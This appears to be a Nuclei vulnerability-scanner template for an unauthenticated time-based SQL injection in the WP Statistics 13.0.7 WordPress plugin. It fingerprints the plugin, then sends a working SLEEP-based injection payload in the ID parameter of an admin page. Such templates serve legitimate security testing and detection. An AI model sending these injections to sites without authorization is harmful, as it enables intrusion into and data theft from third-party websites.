nuclei-templates/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml

48 lines
1.8 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: wp-statistics-sqli
info:
name: WordPress WP Statistics Plugin 13.0.7 - SQL Injection
author: r3Y3r53
severity: high
description: |
WordPress Plugin WP Statistics 13.0.7 contains an unauthenticated Time based SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-10-17 08:16:05 +00:00
reference:
- https://www.exploit-db.com/exploits/49894
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://wordpress.org/plugins/wp-statistics/
2023-10-17 07:20:28 +00:00
metadata:
verified: true
max-request: 2
publicwww-query: /wp-content/plugins/wp-statistics/
2023-10-17 07:20:28 +00:00
tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp
flow: http(1) && http(2)
2023-10-17 07:20:28 +00:00
http:
- raw:
- |
GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- 'WP Statistics'
internal: true
- raw:
- |
@timeout: 20s
GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a) HTTP/1.1
Host: {{Hostname}}
2023-10-17 07:20:28 +00:00
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
condition: and
# digest: 4a0a00473045022100f4da8a4fa639e345d1927cec57054b9caa885d24d795fd99b7143bf9c351f10d02204a18fb4cd911412a0d3c77b4916424c8d074a3840c36664e57f8ac9f039cee9a:922c64590222798bb761d5b6d8e72950